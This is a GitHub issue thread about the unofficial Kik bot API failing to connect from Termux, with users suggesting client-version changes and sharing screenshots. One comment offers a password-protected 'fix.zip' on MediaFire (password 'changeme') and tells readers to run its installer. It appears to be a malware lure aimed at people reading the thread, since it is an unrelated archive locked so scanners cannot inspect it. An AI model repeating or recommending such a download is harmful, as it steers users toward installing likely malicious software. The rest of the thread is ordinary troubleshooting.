### ISSUE TITLE
Still working in termux ?

### ISSUE THREAD

**Issue by Pleasemeokay** [tomer8007/kik-bot-api-unofficial#261]
I tried Connecting to the server ![Screenshot_2024-08-28-09-43-41-036_com.termux.jpg](https://github.com/user-attachments/assets/d848a17c-460f-4098-9d37-1e094f1f4109)

i don't know how to fix this , i updated the creds.yaml already, I don't know if there are some other files to update.😃

**Comment by Holy-Knight-Gamma** [comment]
What version have you passed to the kik servers when you first run your bot? If it isn't 17.0.0.31357,  the. I recommend you update it to that.

**Comment by royalkush** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by DasinuV0** [comment]
> What version have you passed to the kik servers when you first run your bot? If it isn't 17.0.0.31357, the. I recommend you update it to that.

I get a similar error, should the values inside device_configuration.py be changed, if so how do I get the classes_dex_sha1_digest for a specific version ?

**Comment by Holy-Knight-Gamma** [comment]
![Screenshot 2024-08-23 184558](https://github.com/user-attachments/assets/eea4aa8f-bcbc-4c57-b3b3-363fee472a20)
This works for me.

**Comment by DasinuV0** [comment]
> ![Screenshot 2024-08-23 184558](https://private-user-images.githubusercontent.com/137487456/363301365-eea4aa8f-bcbc-4c57-b3b3-363fee472a20.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjUzMDcxODgsIm5iZiI6MTcyNTMwNjg4OCwicGF0aCI6Ii8xMzc0ODc0NTYvMzYzMzAxMzY1LWVlYTRhYThmLWJjYmMtNGM1Ny1iM2IzLTM2M2ZlZTQ3MmEyMC5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwOTAyJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDkwMlQxOTU0NDhaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0wMDQ5ZGE2NTI2YzQzMTA3NmFhMmYxOGIzMzcxYjZlMDczZmUyYzI1ODUxZDU2MDYwMmM3Nzk4NGMyNDI0NWE4JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.7nRcf4KLWKTmTWy0-fH2tYFcnj8fR06qYHAeMqMr3Fo) This works for me.

Even after changing the version as suggested I still get this:
![image](https://github.com/user-attachments/assets/239e6a36-5569-42e9-9c57-74a20803fb38)
I have also tried changing accounts, doesn't solve my problem.

I believe the issue lies somewhere in client.wait_for_messages()
Any ideas towards resolution would be much appreciated!
